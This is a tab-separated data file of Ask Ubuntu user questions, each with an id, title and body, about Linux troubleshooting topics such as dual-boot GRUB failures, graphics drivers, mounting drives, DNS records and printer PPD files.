412736	backbox inside of ubuntu ?	for whatever odd reason , every which way i 've tried to boot backbox from a usb on my lenovo g505 ( amd ) , it fails almost immediately . so i went back to ubuntu 12.04 , and found there was a way to implement backbox tools in ubuntu through the repository . well , me not paying attention , i installed all files from the repository through synaptic , and now when i boot up and see the login screen , i have the option of booting up into ubuntu or booting into a backbox session . logging into the backbox session seems to work just fine , and unless you watched me boot up and log in , you 'd never know i had ubuntu 12.04 on the laptop at all . my question is , is this stable ? will there be any potential issues in the future ? i really like having a pentest distro since i 'm in school as a cyber security major , and if this allows me stable use of backbox , i 'd like to keep it . thanks !
412739	how well does logitech g430 work with linux	i run elementary os which is based of ubuntu 12.04 and i was wondering if anyone had tried logitech g430s with 12.04 .
412741	.xinitrc with keyboard mapping not working	i 'm running ubuntu 13.10 . when i remap keys using xmodmap using the instructions at how do i remap certain keys ? , the remapping works fine . but when i create the .xinitrc file as a plain text file with xmodmap .xmodmap in the home folder , and restart the computer , i still lose the changes . i 've also tried xmodmap ~/.xmodmap but that made no difference . when i simply run xmodmap .xmodmap in the command after booting , it does work . any ideas ?
412742	how to install application offline	i am new on ubuntu . i have no idea to installation on ubuntu . i do n't have an internet connection also . i am also new in ubuntu community . please help me .
412745	how can i upload to ubuntu wallpaper contest ?	is there any other way to upload original content ( wallpapers , pattern , etc . ) to ubuntu design , without using the flickr contest ... ? usually the contest were for ubuntu , but the latest contest is called ubuntu gnome , will the wallpaper contest be available for ubuntu ?
412746	couch potato and ubuntu problem	couch potato is a good interface for automation of movie downloads . installation steps are written in main page as folows : install git with apt-get install git-core 'cd ' to the folder of your choosing . run git clone https : //github.com/ruudburger/couchpotatoserver.git then do python couchpotatoserver/couchpotato.py to start to run on boot copy the init script . sudo cp couchpotatoserver/init/ubuntu /etc/init.d/couchpotato change the paths inside the init script . sudo nano /etc/init.d/couchpotato make it executable . sudo chmod +x /etc/init.d/couchpotato add it to defaults . sudo update-rc.d couchpotato defaults open your browser and go to : http : //localhost:5050/ i applied each step carefully . but i 've 2 problems : i ca n't get daemon to start automatically : i watch logs but no error it downloads torrents well . but it cant communicate with deluge to handle torrents : i again watch logs but no error . i googled the problem : there are same problems with me but no certain solution on the forums . i followed guide here . but again no solution . do you have any experience with that application ?
412747	f2a85v-pro motherboard with amd a10-5800k processor issue with linux systems	since i bought my new machine - f2a85-v pro motherboard , amd a10-5800k processor and 16gb corsair ram , im facing problems with installing every x64 based linux distribution . but not only installing . x86 systems run well but not all . ive upgraded my bios to the newest version ( despite it was not necessary ) . please look at my screenshots to see what happens when i try to load any livecd linux distros or install linux'es on my pc . i tried some methods and have some info about few of these issues , but it 's not enough to make them disappear . maybe it 's a problem with compatibility with the new system , or ... ..i do n't know , maybe someone could suggest some solutions ? thanks in advance.. links to screenshots : https : //plus.google.com/photos/109268532892116210569/albums/5974420098432532705 i 've added a memtest screenshot to the gallery . i 'll make new tests and upload them soon..
412748	ca n't access ubuntu.com or launchpad	i ca n't access ubuntu.com , kubuntu.org , ubuntugnome.org , xubuntu.org , and launchpad.net , and the apt-get repositories , from any computer on my local network . isitdownrightnow.com says it 's up , and every other website i 've tried works as normal . the problem is almost exactly like described here : i ca n't use update manager , access ubuntu related sites or launchpad de.archive.ubuntu.com works , and i can download packages from it , however secutiry.ubuntu.com and us.archive.ubuntu.com does not . i can access ubuntu.com and launchpad.net using tor . i do n't have a firewall .
412749	how to get audio across all xservers ?	i have started a game in new xserver like this : xinit /path/to/the/game/executable -- :1 . this starts the game in new xserver and the game has sound . however it stops the sound in the :0 xserver . what i would like is to play music in the first xserver as well as hear the game on the second xserver . is that possible . i read that i need to add myself to the audio group but that did not help .
412752	how to set up dual monitor on pc without graphic card ? ubuntu 12.04	my pc does have built-in graphic . i have vga switch and using it i would like to setup dual monitor . after pluging both monitors with vga switch i had a duplicated view on both desktops . i would like to have extended view ( mouse coursor goes between two desktops ) . displays settings does not show second monitor . how to setup it ? how to make them two working in extended mode . before vga switch i tried with dpi-dvi adapter , i was lucky to have extended mode on dual monitor but mouse cursor can not go to second monitor - it was stick to the edge . i 've searched for solution to this problem many times . i 've tried with xrandr , ccsm and many others , but nothing worked . lspci | grep -e `` vga '' vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 )
412755	xrdp - how to change keyboard layout	when i open an xrdp session from a windows 7 machine to my ubuntu machine , us keyboard layout is utilized . however , my default keyboard layout is different on ubuntu machine and i want to use it during xrdp sessions . how can i fix this ?
412758	how can i access my home folder in a live usb directly ?	i have just finished installing ubuntu 12.04 from an 'updated ' live usb . by updated i mean i had installed other softwares , removed others , run updates and upgrades , etc . to my surprise , the newly installed system did n't come with the updates . for example , i purged libre office and installed abiword in the live session and on installing i found libre office . can someone please explain to me how that worked out . my home folder question ( according to the title ) is i wanted to copy my entire live usb home folder to the installed home folder including all the .folders and configurations . i just plugged in the usb directly into the newly installed 12.04 and expecting to see all the usual 'bin , boot , etc , var , lib , sys ' folders , i found 'boot , capser , dists , install , pool ' folders . i tried searching for my 'live session ' home folder with no success . how can i access those files without booting again into the live session mode ?
412759	how to install firefox 26 on ubuntu without internet connection	current version of ubuntu that i have is 12.04 which do not have internet connection , what is the instruction or command to update the firefox version from 21 to 26 ?
412761	how do you correctly set up dpm with intel/amd hybrid graphics in 14.04 ?	i have a hp dv6t with the following graphics cards 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] whistler [ radeon hd 6730m/6770m/7690m xt ] i can not for the life of me get dpm to work correctly . and the laptop constantly runs hot with the fans nearly always running . i have the open source amd drivers installed . since i am running ubuntu 14.04 on kernel 3.13 i should not need the arguement `` radeon.dpm=1 '' correct since kernel 3.13 enables it by default . also when i run the command : cat /sys/kernel/debug/dri/64/radeon_pm_info listed in these instructions . all i get is : cat : /sys/kernel/debug/dri/64/radeon_pm_info : no such file or directory
412762	indicator-sound missing + other sound problems 13.10	i seem to have `` destroyed '' my sound in ubuntu 13.10 ... i can change my sound through alsamixer and aplay /usr/share/sounds/alsa/front_center.wav works fine . however the indicator-sound is missing ( but installed , and purging and reinstallation does not help ) . moreover i can not open gnome-control-center sound via terminal because it says : failed to load module : /usr/lib/x86_64-linux-gnu/control-center-1/panels/libsoundnua.so reinstallation of pulseaudio , libpulse0 dies not help ... edit : i forgot to mention something : the terminal also says : libpulsecommon-4.99.so : can not open the shared-object file : file or directory not found ( or something similar , it 's originally in german ) so in which package is this libpulsecommon file ? all i have on my computer is a libpulsecommon-4.0.so file , so probably that 's the problem
412769	how to install drupal on ubuntu 13.10 ?	i installed drupal7 using the community guide from the ubuntu repositories . everything went fine , but when i open localhost/drupal/install.php all i get is a blank white page . i also tried with localhost/drupal6/install.php and localhost/drupal7/install.php but both gives me 404 .
412770	which service ( ubuntu 13.10 ) is putting my laptop to sleep when i close the lid ?	i run a netinstall of ubuntu 13.10 . when i was on 12.10 i had a a sleep.sh script in /etc/acpid that would be invoked by the closelid event in /etc/acpid/events and then basically run pm-suspend . i recently reinstalled the laptop and closing the lid put it to sleep even though i have n't yet installed my custom script . what is causing the laptop to go to sleep then ?
412779	installed ubuntu ( dual boot ) and now windows 8 does n't boot	it shows this whenever i try to boot windows from grub error : ca n't find command `drivemap ' . error : invalid efi file path . press any key to continue ... i 've tried the automatic boot repair and that did n't work . anyone know how to fix this ? i did make a seperate partition in my d drive for ubuntu so windows should still work . boot repair info here : http : //paste.ubuntu.com/6840502/
412780	ubuntu 12.04 not detecting ethernet wired connection	i recently did a full install of ubuntu 12.04 ( not a dual boot ) on my laptop . in the past on my dual boot , i connected to a wired ethernet connection with no trouble at all . now , my laptop is n't detecting a wired connection when the cable is plugged in . i 've tried restarting things and tinkering with files as suggested by other answers with no success . lspci | egrep -i -- color 'network|ethernet' 01:00.0 ethernet controller : qualcomm atheros qca8172 fast ethernet ( rev 10 ) 02:00.0 network controller : qualcomm atheros ar9485 wireless network adapter ( rev 01 )
412781	ubuntu ssh x11 forwarded client very slow	running ssh x forwarded session from my ubuntu 12lts client to a sles server results in very slow ( seconds per mouse click ) gui app ( on the server ) performance . using a windows client from the same lan with putty and xming to ssh to the same server hosted application is blazing fast ( instantaneous ) . likewise , ssh -x from other sles machines to the same server hosted application is very fast . i have tried numerous combinations of ssh parameters ( listed below ) with no effect on performance . the ubuntu client is painfully slow while putty/xming are very fast . -x -c -o gssapiauthentication no -c blowfish-cbc usedns no -- on the servers sshd_config
412782	13.10 , ati radeon hd 5650 mobility , intel , and switchable graphics	so , i 've got a hp envy 14 ( early model ) , with a ati radeon mobile 5650/intel gpu set up . and for the life of me i ca n't seem to switch to the integrated ( intel ) chip . i know i 'm not supported by the fglrx drivers any more , but i ca n't get the stock xorg drivers to switch via vga switcheroo . no matter what i do , the ati chip remains powered and eating battery life . i 've tried the script over at http : //asusm51ta-with-linux.blogspot.com/ , but it does n't seem functional any more . any suggestions ?
412786	windows 8.1 does n't appear in grub2	my case is quite different from other and i ca n't find a solution . i had windows 7 ( 64bits ) and ubuntu 13.10 ( 32bits ) installed on my laptop asus n53s . unfortunately , a blue screen appeared on windows each startup ... but ubuntu continued to run . i decided to remove windows 7 in order to install windows 8.1 ( 64bits ) . it was a good reason to upgrade : - ) i formatted my windows 7 partition . i changed from mbr to gpt with gdisk in order to be able to install windows 8.1 . i succeeded to install windows 8.1 . when i start my computer , grub appears but windows 8.1 does n't appear , i can just to run ubuntu . here are some result : root @ clenet : /home/clenet # parted -l model : ata st9750420as ( scsi ) disk /dev/sda : 750gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 17,4kb 1049kb 1031kb bios boot partition bios_grub 3 26,8gb 27,2gb 315mb ntfs basic data partition hidden , diag 4 27,2gb 27,3gb 105mb fat32 efi system partition boot 5 27,3gb 27,4gb 134mb microsoft reserved partition msftres 6 27,4gb 299gb 272gb ntfs basic data partition msftdata 7 327gb 721gb 394gb microsoft basic data msftdata 8 721gb 742gb 20,3gb ext4 linux filesystem 9 742gb 750gb 8487mb ext4 linux filesystem ubuntu is installed on partition number 8 , windows 8.1 on 6 ( it created the 3,4 and 5 during the installation ) other thing i tried boot-repait and i 've got somme error message . efi detected . please check the options efi detected . please use boot-repair-disk-64bit ( www.sourceforge.net/p/boot-repair-cd ) which contains an efi-compatible version of this software . then i tried is boot-repair-disk ( 64bits ) on a pendrive but it ca n't repair the boot . here is the error message : '' you have installed on sda8 a linux version which is not efi-compatible . it is probably incompatible with your computer . please install an efi-compatible system . for example , linux-secure-remix-64bit and ubuntu-64bit are efi-compatible systems '' . command os-prober gives nothing : root @ clenet : /home/clenet # os-prober root @ clenet : /home/clenet # which command do you want i run to have a better overview ? i 'm quite stuck now , and i ca n't find some help because in my case it is the opposite of other people . i mean , i had ubuntu and now i want to install windows 8.1. : \ i hope someone has some ideas . edit : here is the command update-grub , it just detects my different kernels that i have installed . root @ clenet : /home/clenet # update-grub generating grub.cfg ... found linux image : /boot/vmlinuz-3.12.0-031200-generic found initrd image : /boot/initrd.img-3.12.0-031200-generic found linux image : /boot/vmlinuz-3.11.0-15-generic found initrd image : /boot/initrd.img-3.11.0-15-generic found linux image : /boot/vmlinuz-3.8.0-35-generic found initrd image : /boot/initrd.img-3.8.0-35-generic found linux image : /boot/vmlinuz-3.12.0-031200-generic found initrd image : /boot/initrd.img-3.12.0-031200-generic found linux image : /boot/vmlinuz-3.11.0-15-generic found initrd image : /boot/initrd.img-3.11.0-15-generic found linux image : /boot/vmlinuz-3.8.0-35-generic found initrd image : /boot/initrd.img-3.8.0-35-generic found memtest86+ image : /boot/memtest86+.bin done root @ clenet : /home/clenet # ps : sorry for my english
412793	xubuntu : stop gnome-keyring-daemon from impersonating ssh-agent	i want to use the real ssh-agent instead of gnome-keyring in xubuntu . i followed the steps from http : //dtek.net/blog/how-stop-gnome-keyring-clobbering-opensshs-ssh-agent-ubuntu-1204 , but gnome keyring still registers itself as ssh-agent . i still want to keep using gnome-keyring for other passwords
412795	custom permissions vsftpd	i have two folders inside my ftp root directory , the first one needs to be readable and writable by ftp users ( except for delete operations ) . the second directory needs to allow only uploads ( users can not see , download or delete the files inside this directory ) . i 'm using ubuntu server and vsfdtpd , i tried using chmod but it seems to not be enough . do i have to change some settings on vsftpd ?
412796	is it possible to resolve a hostname from an ip address without dns ?	i have a question , can i ping an ip and return hostname without dns using or ip mapping ? maybe from the arp cache .
412798	service -- status-all -- > what does the column with [ ? ] , [ + ] , and [ - ] mean ?	if i run the command `` service -- status-all '' , each ( running ? ) service is listed in column format . the first column has either a [ ? ] , [ + ] , or [ - ] before the service name . what does this column represent ? what does ? , + , and - mean ? sorry if this is a simple question . i searched online for ~30 minutes before just coming here and asking . i even found this : what do the symbols in service -- status-all mean ? where the `` correct '' answer states `` it draws a [ + ] or [ - ] depending on whether the exit status was zero or nonzero , respectively. '' . so , i guess my new question is what does status zero and nonzero ( ! ? ! ? ! ) mean ?
412801	how to know a mac address for a node knowing its ip on local network ?	is there a way to ping an ip , and know the pc mac address of this ip ? for exapmle in my network there is a printer which has the ip 192.168.1.99 ( dynamic ) , i need to its mac address to give it a reservation in dhcp .
412803	ca n't mount hdd /wrong fs type , bad superblock	i have browsed the many other questions related to my question , there seems to be many solutions for others , but not for me , when i try to mount my hdd using : sudo mount /dev/sdd /media/jinglez/mainfiles i get the error : jinglez @ jinglezserver : ~ $ mount /dev/sdd /media/jinglez/mainfiles mount : wrong fs type , bad option , bad superblock on /dev/sdd , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so as requested , i ran dmesg | tail which returned : jinglez @ jinglezserver : ~ $ dmesg | tail [ 64.337321 ] init : transmission-daemon main process ( 882 ) terminated with status 127 [ 64.337361 ] init : transmission-daemon respawning too fast , stopped [ 64.896160 ] tg3 0000:02:00.0 : irq 42 for msi/msi-x [ 65.695028 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 65.695463 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 99.933921 ] systemd-hostnamed [ 3202 ] : warning : nss-myhostname is not installed . changing the local hostname might make it unresolveable . please install nss-myhostname ! [ 120.906364 ] init : plymouth-stop pre-start process ( 4631 ) terminated with status 1 [ 377.372510 ] ext4-fs ( sdd ) : bad geometry : block count 732566646 exceeds size of device ( 732566381 blocks ) [ 380.264264 ] ext2-fs ( sdd ) : error : could n't mount because of unsupported optional features ( 240 ) [ 382.129108 ] ext3-fs ( sdd ) : error : could n't mount because of unsupported optional features ( 240 ) i 'm fairly new to ubuntu , so it 's safe to say i 'm stumped now , what else can i try ?
412808	ubuntu installation not recognized	i installed ubuntu 13.10 on an external hard drive . during installation i created 3 partitions on that drive ( i followed a guide ) : / , /boot , and swap . the installation completed successfully , however , when i restart , ( boot menu is set to look at externals first ) it does n't find a bootable drive and it proceeds to windows which is installed on my internal hard disk . i am new to linux/ubuntu ... the best fix for me probably would be to reinstall it correctly . how can i fix it ?
412809	why am i losing video sync on ubuntu 13.10 ?	i just installed ubuntu 13.10 . when i want to search something my screen freezes and the video loses sync , with something like this appearing : my system configuration is : * processor amd athlon le-1640 , ~2,7 ghz * 2 gb ram * video nvidia geforce 6150se nforce 410 , integrated ramdac ~825 mb memory
412813	suspend/hibernate broken on macbook pro 10.1 retina with ubuntu 13.10	i installed ubuntu 13.04 on my macbook pro 10.1 with retina display using this tutorial . then i upgraded to 13.10 . everything works great and i really enjoy ubuntu except for one issue . whenever i close the lid of my laptop , or manually enter suspend or hibernate my computer is unable to boot back up . hibernate usually just boots to a black screen and suspend sometimes lets me see the login screen but i ca n't click on anything or type . i always end up having to force shutdown my system and reboot . i read about other people with a similar problem who usually fix it by installing proprietary graphics drivers but every time i try that it makes it so i ca n't boot up at all . it just boots to a completely dark screen and i have to restore my operating system . this issue is important because i ca n't be constantly rebooting my machine every time i close it and if i set it to do nothing when i close the lid the battery dies very fast .
412814	install ubuntu without using a usb or disc ?	i ca n't remember my dell inspiron admin password for entering bios to set it up , so to boot ubuntu from start up and i do n't feel like tearing my laptop apart to take out the bios battery just to reset it , so i was hoping that i could just download ubuntu 12.04 directly to run along with my windows 7 . is it possible or not ?
412815	correct dns records ?	i just got a vps ( 2 cpu , 2 gb ram , 40 gb ssd ) . i 've downloaded and configured virtualmin/webmin . i have two domain names nedegroup.com and nutrizzio.com registered through godaddy . with nedegroup.com i created my nameservers ns1.nedegroup.com and ns2.nedegroup.com , both points to my vps ip 188.226.139.41 , then i 've added those name servers to nedegroup.com and nutrizzio.com nameservers . i 've added nedegroup.com to virtualmin and i have the following dns record for it : $ ttl 38400 @ in soa ns1.nedegroup.com . root.ns1.nedegroup.com . ( 1391023495 10800 3600 604800 38400 ) @ in ns ns1.nedegroup.com . nedegroup.com . in a 188.226.139.41 www.nedegroup.com . in a 188.226.139.41 ftp.nedegroup.com . in a 188.226.139.41 m.nedegroup.com . in a 188.226.139.41 localhost.nedegroup.com . in a 127.0.0.1 webmail.nedegroup.com . in a 188.226.139.41 admin.nedegroup.com . in a 188.226.139.41 mail.nedegroup.com . in a 188.226.139.41 nedegroup.com . in mx 0 mail.nedegroup.com . nedegroup.com . in txt `` v=spf1 a mx a : nedegroup.com ip4:188.226.139.41 ? all '' ns2.nedegroup.com . in a 188.226.139.41 host.nedegroup.com . in a 188.226.139.41 nedegroup.com . in ns ns2.nedegroup.com . autoconfig.nedegroup.com . in a 188.226.139.41 ns1.nedegroup.com . in a 188.226.139.41 and for nutrizzio.com i have the following records : $ ttl 38400 @ in soa ns1.nedegroup.com . root.ns1.nedegroup.com . ( 1391033575 10800 3600 604800 38400 ) @ in ns ns1.nedegroup.com . nutrizzio.com . in a 188.226.139.41 ftp.nutrizzio.com . in a 188.226.139.41 localhost.nutrizzio.com . in a 127.0.0.1 webmail.nutrizzio.com . in a 188.226.139.41 admin.nutrizzio.com . in a 188.226.139.41 mail.nutrizzio.com . in a 188.226.139.41 nutrizzio.com . in mx 5 mail.nutrizzio.com . nutrizzio.com . in txt `` v=spf1 a mx a : nutrizzio.com ip4:188.226.139.41 ? all '' autoconfig.nutrizzio.com . in a 188.226.139.41 nutrizzio.com . in ns ns2.nedegroup.com . www.nutrizzio.com . in a 188.226.139.41 i want to know if this is enough ? or i have to do more configuration ? also i would like to know : +++ why when i type webmail.nedegroup.com nothing happens . it says it can not find the server in browser . +++ i can receive emails from yahoo , hotmail , but i ca n't send email to these domains , where should i check for this problem . thank you .
412818	a script to ping a group of ips and return with just the online ?	i need a script that ping a group of ips and return as a result the online one , it will echo for example 10.10.10.10 is online 10.10.10.11 is online 10.10.10.15 is online without using any package or third party utility ! any help ?
412828	firefox fonts changed after install ttf-mscorefonts	my question is probably simple but i ca n't find a way to revert it to the previous state . after installing mscorecofonts ( which was installed during pipelight installation ) my fonts in firefox went crazy and it is ugly as hell now . can anyone advise how to reset to the `` default '' font setting ?
412831	can not establish odbc connection in access 97	i was tasked with testing the feasibility of having our office switch from windows to linux . i have no prior knowledge or experience with linux . i was able to install and run access97 using wine . however , i can not establish odbc connections to our servers , which run on a mysql platform . after much research , it appears i need some sort of a connector or driver to connect to our servers . i tried some from the openoffice web site just to see if they would work for simple queries in base , but none seemed to work . if any one can help guide me in the right direction toward establishing connections to our servers to run access queries , i 'd really appreciate it .
412833	cd command not working properly ?	just a little perspective , i really new to linux and ubuntu . i had installed it about two days ago , so help me please . even though i already have the regular firefox , i 'm trying to install firefox from mozilla 's site . since i ( at least think ) that i ca n't install through a gui , i 'm trying to install through the terminal using this guide http : //askubuntu.com/a/80593 , however , everytime i try to use the cd command , like , for example cd home/myusername/desktop , it returns with the phrase `` no such file or directory . '' what am i doing wrong ?
412835	kernel panic on boot : not syncing ( hp dv6 , ubuntu 12.10 64bit )	i am running ubuntu 12.10 64bit on an hp pavillion dv6 . everything works fine except i randomly get a kernel panic `` not syncing '' when booting . after manually rebooting i usually get the same error ; after few iterations where i try different configurations ( e.g . on battery vs plugged ) it usually resumes working as normal and no damage is done . after trying to troubleshoot the issue i come to the conclusion that it must be the acpi module failing : it would seem that , if i shut down the laptop when on battery power , unless i start it on battery i would get the kernel panic . is this a known issue ? i do not know the acpi internals enough to know where to look . edit : it would also be nice to know if upgrading to more recent versions of ubuntu has a chance of solving the issue ( e.g . has the acpi module been upgraded with changes that may be relevant to this problem ? )
412839	ubuntu 13.10 dual monitor setup	using ubuntu 13.10 , i 'm trying to setup a second monitor . my installation is working just fine . in system settings > displays all the options are working properly . `` mirror displays '' is unchecked , the external monitor is recognized . after selecting desired resolution and applying i get an error message stating the requested size exceeds 3d hardware limit and i need to either change it or switch to 2d . no problem , i understand that completely . i looked through other posted questions to find how to switch to 2d . one answer stated to click the ubuntu icon next to the username on the login screen and select it from there . the problem is , there is no ubuntu icon on the login screen ; just the couple of basic options in the top-right corner . but none of those are applicable . so how do i change the resolution limit or switch to 2d ?
412840	asus laptop fan being extremely loud after installing ubuntu 12.04 lts	from what i have read it is because i have an integrated intel cpu and gpu ( 4000 ) and a dedicated nvidia 740m graphics card . i do not have nvidia drivers and i 'm not sure if that is the issue or not . it is not a mechanical issue ( dust ) as the fan works perfectly fine in windows . if someone can point me in the right direction that would be great . the cpu activity barely goes over 20 percent too .
412841	where can i download ati mobility x2300 driver ?	where can i download this driver ? i found this , but still i do n't have a download .
412844	can i view firefox history with the terminal ?	is there a command to show firefox history from the terminal ? without the need to enter firefox history graphically .
412847	just installed ubuntu 12.04 , not sure if i did it right	my dual boot installation of ubuntu crashed a few days ago , and i re-installed it from scratch while getting rid of the dual boot . i 've had issues in the past , so i 'm nervous about the `` quality '' of my installation - i let the auto installer do it for me this time . my gparted looks like this : is this correct/optimal ? i had the `` unknown partition , grub rescue '' prompt after my installation , so i created the bios_grub partition as seen below and things seem to be working for now . but if history repeats itself , i 'll be troubleshooting in a few months .
412848	`` operation system not found '' booting from usb drive	i 'm trying to boot chromium from a usb drive and i 'm anticipating the same problem i 'm about to describe to happen when i try ubuntu , which is currently downloading , i was just using chromium to test my ability to boot from a usb drive because ultimately my goal is to run ubuntu from my flash drive . anyway , i wrote the os to a disk using win32diskimager or something , after i unzipped it with 7-zip , i restarted my computer , changed the boot order in bios to usb and removable drives before the hard drive , put the flash drive in , restarted again , and when it tries to boot to the usb drive , it says `` operation system not found '' ( not a typo ) . please help me ! i 've never done this before . i 'm running windows 7 , bios a07 , 8gb flash drive . any other specs you need , let me know . hoping to run ubuntu soon , i got it to work in virtual machine , but not booting from a usb . thanks for your help
412849	put monitor to sleep when locked ?	whenever ubuntu 13.10 locks : instead of making the monitor go black and the power button ( on the monitor ) turn orange like windows did . it loses connection to the computer and shows me the dell color test thing . can i change this ?
412851	missing icons from system settings in 12.04	every time i go to system settings it looks like this : most of the icons are missed and when i search them in unity2d dashboard they appear but when i click they redirect me to the same page . i tried sudo apt-get install gnome-control-center-signon and sudo apt-get install gnome-control-center-unity but nothing happened .
412852	epson borderless option not available for custom paper size ( custom ppd file needed )	any ppd experts out there ? i am trying to print a custom paper size of 932.6 x 1728 mm with borderless option . what i need is a working ppd file for an epson workforce printer . i 've validated the ppd file i created from the original and while the printer shows the added 'cs/customsize ' paper option , the printer has an error while printing but there are no details . i believe i am missing something here , please help ! this is my problem : on epson 7xxx and 3xxxx series printers , there is a limitation where you can either print on a selection of borderless 'document sizes ' , or print on a custom 'user defined ' paper size but you can not do both . epson support does n't offer linux support and any tech you call says that it 's a limitation of the driver and ca n't be done but i know they 're wrong . the few places you can find it , this is what their support documents say : note : you must select a compatible borderless paper type and size to print borderlessly . check the borderless paper compatibility list for details . you can not print borderless with a custom paper size . as soon as you choose the option of a `` user defined '' paper size , the borderless option goes away ( no matter if you make the size the same as an existing one ) . i need to print using a custom page size but i also need the borderless option . i tried a few things but windows gave me no options ( though winxp with 'print management ' seemed promising at first ) . so i moved to linux and i believe i have found a solution for my problem but i need to create a custom ppd file . here is the original ppd file for the epson workforce 7010 series printer : https : //drive.google.com/file/d/0bxvwcuy4wjipsnvfumw3bhixbek here is my customized ppd file for the epson workforce 7010 series printer : https : //docs.google.com/file/d/0bxvwcuy4wjipbdh0vxhuogz1eke what i 've done : 1 ) i 've used the utility 'cupstestppd ' in ubuntu linux and after some trial and error it returns a pass value but i believe i might be missing something or not setting a value correctly . 2 ) i 've tried a series of steps on windows with no success , including but not limited to modifying registry values , installing 10+ different driver sets and etc . 3 ) i 've posted on a printer forum as well as stackoverflow.com and received no useful response as of yet , nor was it received well and no one explains anything . i 'd appreciate any help i could get . this is the 'cupstestppd ' output : /home/leeters/desktop/custom-epson-wf-7010_series-ppd.ppd : pass warn non-standard size name `` 4x6in '' ! ref : page 187 , section b.2 . warn non-standard size name `` 5x7in '' ! ref : page 187 , section b.2 . warn non-standard size name `` a3+ '' ! ref : page 187 , section b.2 . warn non-standard size name `` pm '' ! ref : page 187 , section b.2 . warn non-standard size name `` 3.5x5in '' ! ref : page 187 , section b.2 . warn non-standard size name `` 5x8in '' ! ref : page 187 , section b.2 . warn non-standard size name `` 8x10in '' ! ref : page 187 , section b.2 . warn non-standard size name `` 169widesize '' ! ref : page 187 , section b.2 . warn non-standard size name `` 100x148mm '' ! ref : page 187 , section b.2 . warn non-standard size name `` envelope_10 '' ! ref : page 187 , section b.2 . warn non-standard size name `` envelopedl '' ! ref : page 187 , section b.2 . warn non-standard size name `` envelopec4 '' ! ref : page 187 , section b.2 . warn non-standard size name `` envelopec6 '' ! ref : page 187 , section b.2 . my goal : 1 ) get this working . 2 ) i know there are others that could benefit from better functionality of the workforce printer class , so after i get this working i would like to create a global workforce driver package for linux/ubuntu in the form of a deb file that can just be simply installed . anyone can use it to get around the limitations of the driver . once i figure out how this works i will also create detailed documentation to modify the deb package and hopefully the printer functionality will be improved further . it will work with any workforce printer once i get the ppd file working . i appreciate the help and thank you in advance .
412854	can not open jar files	i am trying to run java programs that were originally created for use in windows on ubuntu . i am able to download the files , change the permissions to make them executable , and open with adobe jdk java 6 , but nothing happens when i do . no error messages . i even set the default application settings to open with jdk java 6 when double clicking ; nothing happens . i tried opening from terminal as well , and it just stalls . i can run the same program in windows 7 just fine . sorry for such a vague description . just started using linux last week .
412855	xwinwrap with dual monitor setup	first off i would like to know if there is any documentation on xwinwrap . personally i could n't find any . i 'm trying to get my xwinwrap to work on my dual monitors . i 'm running the following script to display a .wmv file on top of my desktop : # ! /bin/bash killall -9 mplayer killall -9 xwinwrap xwinwrap -ni -o 0.65 -g 1920x1080 -fs -s -st -sp -b -nf -- mplayer -wid wid -quiet ~/wallpapers/blue-room.wmv -loop 0 ; & xwinwrap -ni -o 0.65 -g 1920x1080+1+0 -fs -s -st -sp -b -nf -- mplayer -wid wid -quiet ~/wallpapers/blue-room.wmv -loop 0 ; & as you can see i 'm running the xwinwrap command twice to try and specify my monitors . the -g ( geometry ) command let 's me specify a dimension , i get that . but i 'm not quite famillair with the input of +1+0 . i suppose it got something to do with setting an offset to the geometry ? either ways , for now it only seems to run xwinwrap twice on my second monitor ( not my first ) . i 'm using a ati radeon hd 5780 graphics card with ubuntu 12.04 lts . if there is anyone who can help me out on this i 'd greatly appreciate it . edit : would i be better off using anibg ?
412856	how to specify in password input dialog the language always to be english ?	in gnome i often enter sudo password when russian language is being selected . it 's so annoying to wait for password verification fail , to switch to english and retype the password ! is there a way to force english in password input dialog ? especially on logon screen .
412859	virtualbox does n't work with a real partition	so i followed the instructions here . however , when i went to virtualbox and told it to use the file i got the error failed to open the hard disk file /home/parth/win7.vmdk . permission problem accessing the file for the medium '/home/parth/win7.vmdk ' ( verr_access_denied ) . result code : vbox_e_file_error ( 0x80bb0004 ) component : medium interface : imedium { 05f2bbb6-a3a6-4fb9-9b49-6d0dda7142ac } callee : ivirtualbox { fafa4e17-1ee2-4905-a10e-fe7c18bf5554 } callee rc : vbox_e_object_not_found ( 0x80bb0001 )
412862	ubuntu does not recognize usb	so guys , i was about to install ubuntu into my usb . but recently i formatted my usb drive as fat and clear all the data . after that the computer does n't recognize the usb any more . when i open nautilus it does n't show the drive . i tried sudo fdisk -l : disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0008fcc4 device boot start end blocks id system /dev/sda1 * 2048 310505471 155251712 83 linux /dev/sda2 310507518 312580095 1036289 5 extended /dev/sda5 310507520 312580095 1036288 82 linux swap / solaris also a screenshot from gnome-disks ( i plug it in but nothing changed ) .
412863	how to disable the leds is my laptop ?	i have an acer aspire s3 and ubuntu runs fine on it . however the leds are always on ( charging etc . ) any way to permanently disable them ?
412865	ca n't install pantheon on xubuntu 13.10	i 'm trying to install pantheon on xubuntu 13.10 64bit . i followed the instructions given in the accepted answer here . i log out after sudo ./congrego.sh -- configure-installed is done . but i only see 2 desktops xubuntu and and xfce there 's no pantheon , it does n't show on the login screen so i ca n't select it . i could try all of the answers and see what answer works , but the first answer sudo ./congrego.sh -- configure-installed took 2 days to download and install the dependencies because my connection is slow , i would like to know how to make the first answer work rather than to try other solutions and see what works .
412867	mysql can not start : job failed to start	i am trying to sync two databases using a local ip . a main database is created on host computer and i 'm trying to sync data from another computer to this database through a local network . i changed the bind address and commented the skip-networking in the my.cnf file in the folder /etc/mysql . but when i try to restart mysql server it stops and fails to start again .
